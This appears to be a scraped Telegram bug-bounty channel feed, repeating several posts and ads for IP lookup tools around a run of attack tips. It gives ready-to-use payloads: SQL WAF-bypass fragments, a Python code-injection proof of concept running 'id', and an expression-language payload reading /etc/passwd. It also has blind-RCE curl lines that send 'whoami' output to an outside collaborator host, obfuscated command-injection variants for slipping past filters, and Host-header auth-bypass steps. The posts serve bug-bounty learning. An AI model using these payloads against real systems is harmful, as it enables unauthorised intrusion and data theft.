โก๏ธOutdated but Helpful Some MySQL tricks to break some #WAFs out there. โ๏ธ by @BRuteLogic
#infosec #cybersec #bugbountytips
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`#infosec #cybersec #bugbountytips
โค17
Hey Hunter's,
Darkshadow here back again, and Just Look at the wild thing:
User 1 Password:
protecting_my_accounts_with_long_readable_passwords123
User 2 Password:
protecting_my_accounts_with_long_readable_passwords456
If the web application using bcrypt hash algorithm then both user can login each other using there different password!
Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes (73th, 74th ...) are ignored!
So if the any users first 72 bytes are same (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.
#bugbountytips
Darkshadow here back again, and Just Look at the wild thing:
User 1 Password:
protecting_my_accounts_with_long_readable_passwords123
User 2 Password:
protecting_my_accounts_with_long_readable_passwords456
If the web application using bcrypt hash algorithm then both user can login each other using there different password!
Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes (73th, 74th ...) are ignored!
So if the any users first 72 bytes are same (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.
#bugbountytips
๐ฟ10โค5
Hey Hunter's,
Darkshadow here back again, with another unique RCE method!
๐RCE via Python Code Injection:
โ POC:
Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments โค๏ธ
Don't forget to follow me guys x.com/darkshadow2bd
Darkshadow here back again, with another unique RCE method!
๐RCE via Python Code Injection:
โ POC:
{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}
Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments โค๏ธ
Don't forget to follow me guys x.com/darkshadow2bd
โค19๐ฑ9๐ฟ1
๐ Tool of the Day: IPING โ IP Lookup & Detection
๐ Need quick IP facts? IPING lets you lookup any IP or domain
๐ Instant, accurate, and totally free โ returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
๐งญ Try it now: https://www.iping.cc/
#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
๐ Need quick IP facts? IPING lets you lookup any IP or domain
๐ Instant, accurate, and totally free โ returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
๐งญ Try it now: https://www.iping.cc/
#osint #infosec #cybersecurity #recon #bugbounty #tools #ip
๐ฅ3โค2๐1๐1๐ฟ1
๐The ultimate 403 Bypass wordlists and tester notes by JHaddix
๐ฑ Github: ๐ Link
---------------------------------------------------------
๐ ๐๐๐ฏ๐๐ฅ ๐๐ฉ ๐๐จ๐ฎ๐ซ ๐๐ฒ๐๐๐ซ๐๐๐ ๐๐๐ฆ๐! ๐ฅ
๐ brutsec.com
๐ฑ ๐๐๐ฅ๐๐ ๐ซ๐๐ฆ: t.iss.one/brutsecurity
๐ผ ๐: x.com/brutsecurity
๐ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐๐จ๐๐๐ฆ๐๐ฉ: topmate.io/saumadip/1391531
๐ ๐๐จ๐ฎ๐ซ๐ฌ๐ ๐๐ง๐ซ๐จ๐ฅ๐ฅ๐ฆ๐๐ง๐ญ: wa.link/brutsecurity
โญ ๐๐ข๐ค๐ ๐ญ๐ก๐ข๐ฌ ๐ฉ๐จ๐ฌ๐ญ? โ ๐ ๐จ๐ฅ๐ฅ๐จ๐ฐ, ๐๐จ๐ข๐ง, ๐๐ฎ๐๐ฌ๐๐ซ๐ข๐๐ & ๐๐๐ง๐ ๐๐ญ๐๐ซ๐ฌ ๐ญ๐จ ๐ฌ๐ก๐จ๐ฐ ๐ฒ๐จ๐ฎ๐ซ ๐ฌ๐ฎ๐ฉ๐ฉ๐จ๐ซ๐ญ!
#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
๐ฑ Github: ๐ Link
---------------------------------------------------------
๐ ๐๐๐ฏ๐๐ฅ ๐๐ฉ ๐๐จ๐ฎ๐ซ ๐๐ฒ๐๐๐ซ๐๐๐ ๐๐๐ฆ๐! ๐ฅ
๐ brutsec.com
๐ฑ ๐๐๐ฅ๐๐ ๐ซ๐๐ฆ: t.iss.one/brutsecurity
๐ผ ๐: x.com/brutsecurity
๐ ๐๐ญ๐ก๐ข๐๐๐ฅ ๐๐๐๐ค๐ข๐ง๐ ๐๐จ๐๐๐ฆ๐๐ฉ: topmate.io/saumadip/1391531
๐ ๐๐จ๐ฎ๐ซ๐ฌ๐ ๐๐ง๐ซ๐จ๐ฅ๐ฅ๐ฆ๐๐ง๐ญ: wa.link/brutsecurity
โญ ๐๐ข๐ค๐ ๐ญ๐ก๐ข๐ฌ ๐ฉ๐จ๐ฌ๐ญ? โ ๐ ๐จ๐ฅ๐ฅ๐จ๐ฐ, ๐๐จ๐ข๐ง, ๐๐ฎ๐๐ฌ๐๐ซ๐ข๐๐ & ๐๐๐ง๐ ๐๐ญ๐๐ซ๐ฌ ๐ญ๐จ ๐ฌ๐ก๐จ๐ฐ ๐ฒ๐จ๐ฎ๐ซ ๐ฌ๐ฎ๐ฉ๐ฉ๐จ๐ซ๐ญ!
#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity
โค9
โกSubDomain Grabber - A bug bounty tool to download, unzip, and clean subdomains from Chaos ProjectDiscovery.
๐จConverts *.abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.
โ https://github.com/MuhammadWaseem29/SubDomain-Grabber
๐จConverts *.abc.com to https://abc.com, organizes into directories, and removes ZIPs. Offers a colorful CLI, filters (BugCrowd, HackerOne, etc.), sorting, and pagination.
โ https://github.com/MuhammadWaseem29/SubDomain-Grabber
โค6๐ณ1
๐ฐ๏ธ Discover IPING โ Your Go-To IP Intelligence Tool
๐ก IPING helps you uncover whatโs behind any IP address in seconds.
๐ From location and ASN to proxy status and risk level โ all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
๐ Explore now: https://www.iping.cc/
๐ก IPING helps you uncover whatโs behind any IP address in seconds.
๐ From location and ASN to proxy status and risk level โ all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.
๐ Explore now: https://www.iping.cc/
โค5๐ฅ3
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ16โค6๐1
Hey Hunter,
what do you think Web Cache to RCE possible or not?
Yes! Itโs really very intresting, Post coming Soon.
what do you think Web Cache to RCE possible or not?
Yes! Itโs really very intresting, Post coming Soon.
๐ฑ20๐ซก6โค5
Hey Hunter's,
Darkshadow here back again, dropping a really very interesting Method.
๐Web cache to RCE!๐
While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.
Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.
โ Exploit to reproduce final RCE:
1. The webapp was sending request from client side in a array based parameter.
2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.
3. Now the web application is not able to handle this input and makes error and store in a cache file.
4. After visiting the cache file, The error message reflecting on the cache file.
5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!
Follow me for more methods x.com/darkshadow2bd
Darkshadow here back again, dropping a really very interesting Method.
๐Web cache to RCE!๐
While i normally visit the web application i noticed, the website actively makes cache file from clint side to store errors.
Now The idea is, if we able to make any custom error then it will be cached, and if any how the error execute on the system we might see the output.
โ Exploit to reproduce final RCE:
1. The webapp was sending request from client side in a array based parameter.
2. Change the valid Input to a PHP code using system function. Here we just try to making a error using the invalid input.
3. Now the web application is not able to handle this input and makes error and store in a cache file.
4. After visiting the cache file, The error message reflecting on the cache file.
5. But wait, it's also execute my PHP code and store the command output in the file. Means we can execute OS commands output in cache file via making error. Means RCE!
Follow me for more methods x.com/darkshadow2bd
๐ฅ20๐ฟ8๐ฑ4๐2โค1๐ข1
Hey Hunter's,
DarkShadow here back again, dropping a another interesting method!
๐Auth bypass using Host Headerโ
โ Step to Reproduce:
1. Open target in BurpSuite, and simply visit as possible deeper.
2. Filter all JS script files.
3. Figure out any sensitive path as well any Admin dashboard path.
4. Send request on the path via changing Host Header to localhost.
It's looks very simple guy's but still very impactful. Always add this technique in your checklist.
And also add me in your follow list๐
x.com/darkshadow2bd
#bugbountytips #authbypass
DarkShadow here back again, dropping a another interesting method!
๐Auth bypass using Host Headerโ
Guy's This is most easiest and simple way to find most critical bug.
โ Step to Reproduce:
1. Open target in BurpSuite, and simply visit as possible deeper.
2. Filter all JS script files.
3. Figure out any sensitive path as well any Admin dashboard path.
4. Send request on the path via changing Host Header to localhost.
It's looks very simple guy's but still very impactful. Always add this technique in your checklist.
And also add me in your follow list๐
x.com/darkshadow2bd
#bugbountytips #authbypass
1๐ฅ18โค9๐2๐คจ2๐1๐ค1
Hey Hunterโs,
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
โ POC Payload:
If you guyโs are really enjoy to read then show your love.
#bugbountytips #rce
DarkShadow here back again, dropping another easiest way to get critical bugs!
If You Ever See Language Parameter, Then Never Forget to Test Expression-Language Injection Style Payload.
โ POC Payload:
1. Change the Method GET to POST
2. Language={${system("cat+/etc/passwd")}}
If you guyโs are really enjoy to read then show your love.
#bugbountytips #rce
1๐ฅ27โค9๐5
Guys wanna see a very interesting blind RCE?
1๐ฅ25๐10
Hey Hunterโs,
DarkShadow here back again!
โ ๏ธBlind Remote Code Execution๐ฅ
โ POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Others format you might try:
curl
curl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check
Now you hit follow me for more: x.com/darkshadow2bd
DarkShadow here back again!
โ ๏ธBlind Remote Code Execution๐ฅ
โ POC: [Preferred format]
curl -X POST -d \"user=$(whoami)\" https://BURP_LINK"
Others format you might try:
curl
whoami.BURP_LINKcurl $(whoami).BURP_LINK
some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output.
NOTICE: always check
User-Agent Header in your burp collaborator responds, if here you got curl means RCE.Now you hit follow me for more: x.com/darkshadow2bd
1๐ฅ24โค6๐ฟ6๐3
Hey Hunter's,
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
โ cat /etc/hosts
โ tac /e\t\c/h\o\s\t\s
โ tac${IFS}/e\t\c/h\o\s\t\s
โ tac /e*c/h*st*
โ tac /e{t,c}*/{o,h}*s*{s,t}
โ tac /??c/??sts
Let me know guy's you all wants more or not like that?
DarkShadow here back again, dropping some bypass methods that definitely help you.
Trying OS command injection, but WAF blocks every times?
โ cat /etc/hosts
โ tac /e\t\c/h\o\s\t\s
โ tac${IFS}/e\t\c/h\o\s\t\s
โ tac /e*c/h*st*
โ tac /e{t,c}*/{o,h}*s*{s,t}
โ tac /??c/??sts
Let me know guy's you all wants more or not like that?
1โค14๐ฑ11๐ฅ6๐2
Brut Security
Hey Hunter's, DarkShadow here back again, dropping some bypass methods that definitely help you. Trying OS command injection, but WAF blocks every times? โ cat /etc/hosts โ
tac /e\t\c/h\o\s\t\s โ
tac${IFS}/e\t\c/h\o\s\t\s โ
tac /e*c/h*st* โ
tac /e{t,c}*/{oโฆ
This is for copy cats who copy my posts and share without cradit:
~DarkShadow
Hey copy cats, stop copying my posts and do your self. If you don't think deeply then first learn deeply.
~DarkShadow
1๐ค9โค5๐ซก4๐ฅ2๐ฟ2